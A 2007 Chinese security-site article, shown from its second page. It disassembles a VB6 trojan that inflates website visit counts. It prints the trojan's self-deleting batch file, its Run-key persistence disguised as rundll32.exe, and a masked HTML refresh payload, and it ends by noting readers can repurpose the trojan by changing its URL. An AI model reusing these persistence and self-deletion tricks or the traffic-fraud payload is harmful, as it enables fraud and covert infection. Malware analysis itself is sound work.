对刷网站访问量的木马分析 _ 技术文章〓中国安全在线〓打造最优秀的新手成长第一起跑线!

执着成就未来技术成就梦想

新闻: 黑客新闻 IT新闻时事新闻站内新闻漏洞公告病毒公告代理公布论坛新闻安全新闻	论坛
文摘: 入侵攻击漏洞研究操作系统建站技术技巧知识网管天地菜鸟学习安全防护 QQ技巧	学习
软件: 扫描检测远程监控脚本注入拒绝攻击嗅探监听木马后门字典代理密码破解 QQ软件	下载
动画: 入侵动画木马教程漏洞利用加密破解软件应用ＱＱ动画综合教程黑客编程在线服务	动画

文字横幅以及760*60黄金广告位置招租,欢迎恰谈！　广告业务联系QQ:8019399　声明：在本站所投放广告内容均与本站立场无关！

首页 | 新闻 | 漏洞 | 防范 | QQ技巧 | 入侵 | 菜鸟 | 扫描 | 控制 | 后门 | QQ软件 | 注射 | 网管 | 编程 | 文学 | 教程 | 服务| 论坛

您现在的位置：中国安全在线 >> 攻防技术 >> 网络编程 >> 文章正文

用户登录

新用户注册

专题栏目

对刷网站访问量的木马分析

作者：佚名来源：安全在线更新时间：2007-1-15 【字体：小大】
<%=(int(rnd()1)+1)%>您当前的位置：中国安全在线cnsafer.com　请进入[技术论坛]发表评论 EFFFF LEA ECX,DWORD PTR SS:[EBP-1C0] 00404FA7 . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj 00404FAD . C745 FC 26000>MOV DWORD PTR SS:[EBP-4],26 00404FB4 . 68 F4274000 PUSH Rundll32.004027F4 ; del killme.bat 00404FB9 . 6A 01 PUSH 1 00404FBB . 68 B4274000 PUSH Rundll32.004027B4 00404FC0 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404FC6 . 83C4 0C ADD ESP,0C 00404FC9 . C745 FC 27000>MOV DWORD PTR SS:[EBP-4],27 00404FD0 . 68 18284000 PUSH Rundll32.00402818 ; cls 00404FD5 . 6A 01 PUSH 1 00404FD7 . 68 B4274000 PUSH Rundll32.004027B4 00404FDC . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404FE2 . 83C4 0C ADD ESP,0C 00404FE5 . C745 FC 28000>MOV DWORD PTR SS:[EBP-4],28 00404FEC . 68 24284000 PUSH Rundll32.00402824 ; exit 00404FF1 . 6A 01 PUSH 1 00404FF3 . 68 B4274000 PUSH Rundll32.004027B4 00404FF8 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile 00404FFE . 83C4 0C ADD ESP,0C 00405001 . C745 FC 29000>MOV DWORD PTR SS:[EBP-4],29 00405008 . 6A 01 PUSH 1 0040500A . FF15 A4104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileCl>; msvbvm60.__vbaFileClose 00405010 . C745 FC 2A000>MOV DWORD PTR SS:[EBP-4],2A 00405017 . 833D A8934000>CMP DWORD PTR DS:[4093A8],0 0040501E . 75 1C JNZ SHORT Rundll32.0040503C 00405020 . 68 A8934000 PUSH Rundll32.004093A8 00405025 . 68 94254000 PUSH Rundll32.00402594 生成批处删记录 killme.bat echo off sleep 100 del rundll322.exe del killme.bat cls exit 简单的写注册表run。 004046ED . BA 5C284000 MOV EDX,Rundll32.0040285C ; software\microsoft\windows\currentversion\run 004046F2 . 8D8D 08FFFFFF LEA ECX,DWORD PTR SS:[EBP-F8] 004046F8 . FF15 40114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCop>; msvbvm60.__vbaStrCopy 004046FE . C745 FC 17000>MOV DWORD PTR SS:[EBP-4],17 00404705 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.00402>; windir 0040470F . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8 00404719 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234] 0040471F . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4] 00404725 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDup>; msvbvm60.__vbaVarDup 0040472B . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4] 00404731 . 52 PUSH EDX 00404732 . 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4] 00404738 . 50 PUSH EAX 00404739 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnvironV>; msvbvm60.rtcEnvironVar 0040473F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.00402>; \rundll32.exe 直接给出分析的总结吧。程序只是为了刷访问量，没有什么后门，也就隐藏了URL，用XXXX代理了。程序运行后，你的电脑会访问 http://www.xxxxxxxx.com/tc/MMResult.asp 看代码 <HTML><HEAD><TITLE>.</TITLE> <meta http-equiv="refresh" content="1; url=http://www.xxxx.net"> ‘地址用xxx代替了 </HEAD><BODY> <script src='http://s47.cnzz.com/stat.php?id=223697&web_id=223697' language='JavaScript' charset='gb2312'></script> ’站长站的流量统计 </BODY></HTML> 把自身复制到c:/windows/，会生成批处删本地目录运行程序。 killme.bat echo off sleep 100 del rundll322.exe del killme.bat cls exit 程序的运行方式是写注册表 software\microsoft\windows\currentversion\run 键值rundll32.exe 程序写的不好，要插入进程，那效果会好点。只要把他程序的URL修改一下这个木马就可以自己使用了。上一页 [1] [2]* 您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力
文章录入：ls1238 责任编辑：ls1238
	上一篇文章：简单线程注入的实现下一篇文章：免杀修改特征码需要掌握的汇编知识
【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

Copyright ?2003-2008 www.cnsafer.com All Rights Reserved.
如有意见请与我们联系　Email:admin#mail.cnsafer.com 联系QQ:8589101
中国安全在线友情提示：建议使用IE6.0或以上版本, 分辩率1024*768进行浏览
敢想敢做挑战自我努力做最好打造最优秀的新手成长第一起跑线
中网科技有限公司技术支持　鄂ICP备05006475号